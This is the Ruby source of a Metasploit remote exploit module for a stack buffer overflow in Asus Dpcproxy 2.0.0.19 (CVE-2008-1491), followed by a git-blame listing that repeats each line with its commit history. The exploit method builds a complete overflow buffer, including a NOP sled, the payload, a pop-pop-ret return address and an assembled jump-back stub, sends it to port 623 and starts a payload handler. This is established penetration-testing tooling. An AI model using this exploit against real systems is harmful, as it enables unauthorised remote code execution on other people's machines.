modules/exploits/windows/misc/asus_dpcproxy_overflow.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Asus Dpcproxy Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Asus Dpcroxy version 2.0.0.19.
          It should be vulnerable until version 2.0.0.24.
          Credit to Luigi Auriemma
        },
        'Author' => 'Jacopo Cervini',
        'References' => [
          [ 'CVE', '2008-1491' ],
          [ 'OSVDB', '43638' ],
          [ 'BID', '28394' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Payload' => {
          'Space' => 400,
          'BadChars' => "\x07\x08\x0d\x0e\x0f\x7e\x7f\xff",
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Asus Dpcroxy version 2.00.19 Universal', { 'Ret' => 0x0040273b } ], # p/p/r
        ],
        'Privileged' => true,
        'DefaultTarget' => 0,
        'DisclosureDate' => '2008-03-21',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(623)])
  end

  def exploit
    connect

    sploit = make_nops(0x38a - payload.encoded.length) + payload.encoded + rand_text_english(6032)
    sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2)
    sploit << [target.ret].pack('V') + make_nops(8) + Metasm::Shellcode.assemble(Metasm::Ia32.new, "add bh,6 add bh,6 add bh,2 push ebx ret").encode_string # jmp back
    sploit << make_nops(50)

    print_status("Trying target #{target.name}...")
    sock.put(sploit)
    select(nil, nil, nil, 3) # =(

    handler
    disconnect
  end
end
get rid of some more ^Ms 2009-12-15 18:47:29 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
get rid of some more ^Ms 2009-12-15 18:47:29 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = AverageRanking`
get rid of some more ^Ms 2009-12-15 18:47:29 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
get rid of some more ^Ms 2009-12-15 18:47:29 +00:00
			`def initialize(info = {})`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Asus Dpcproxy Buffer Overflow',`
			`'Description' => %q{`
stop perpetuating the ambiguity! 2010-05-09 17:45:00 +00:00			`This module exploits a stack buffer overflow in Asus Dpcroxy version 2.0.0.19.`
get rid of some more ^Ms 2009-12-15 18:47:29 +00:00			`It should be vulnerable until version 2.0.0.24.`
			`Credit to Luigi Auriemma`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`},`
			`'Author' => 'Jacopo Cervini',`
			`'References' => [`
get rid of some more ^Ms 2009-12-15 18:47:29 +00:00			`[ 'CVE', '2008-1491' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '43638' ],`
get rid of some more ^Ms 2009-12-15 18:47:29 +00:00			`[ 'BID', '28394' ],`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'DefaultOptions' => {`
get rid of some more ^Ms 2009-12-15 18:47:29 +00:00			`'EXITFUNC' => 'process',`
			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Payload' => {`
			`'Space' => 400,`
get rid of some more ^Ms 2009-12-15 18:47:29 +00:00			`'BadChars' => "\x07\x08\x0d\x0e\x0f\x7e\x7f\xff",`
			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Platform' => 'win',`
			`'Targets' => [`
			`[ 'Asus Dpcroxy version 2.00.19 Universal', { 'Ret' => 0x0040273b } ], # p/p/r`
get rid of some more ^Ms 2009-12-15 18:47:29 +00:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Privileged' => true,`
			`'DefaultTarget' => 0,`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DisclosureDate' => '2008-03-21',`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`
get rid of some more ^Ms 2009-12-15 18:47:29 +00:00
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`register_options([Opt::RPORT(623)])`
get rid of some more ^Ms 2009-12-15 18:47:29 +00:00			`end`

			`def exploit`
			`connect`

Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`sploit = make_nops(0x38a - payload.encoded.length) + payload.encoded + rand_text_english(6032)`
get rid of some more ^Ms 2009-12-15 18:47:29 +00:00			`sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2)`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`sploit << [target.ret].pack('V') + make_nops(8) + Metasm::Shellcode.assemble(Metasm::Ia32.new, "add bh,6 add bh,6 add bh,2 push ebx ret").encode_string # jmp back`
get rid of some more ^Ms 2009-12-15 18:47:29 +00:00			`sploit << make_nops(50)`

			`print_status("Trying target #{target.name}...")`
			`sock.put(sploit)`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`select(nil, nil, nil, 3) # =(`
get rid of some more ^Ms 2009-12-15 18:47:29 +00:00
			`handler`
			`disconnect`
			`end`
More osvdb references from Steve Tornio 2009-05-13 17:39:42 +00:00			`end`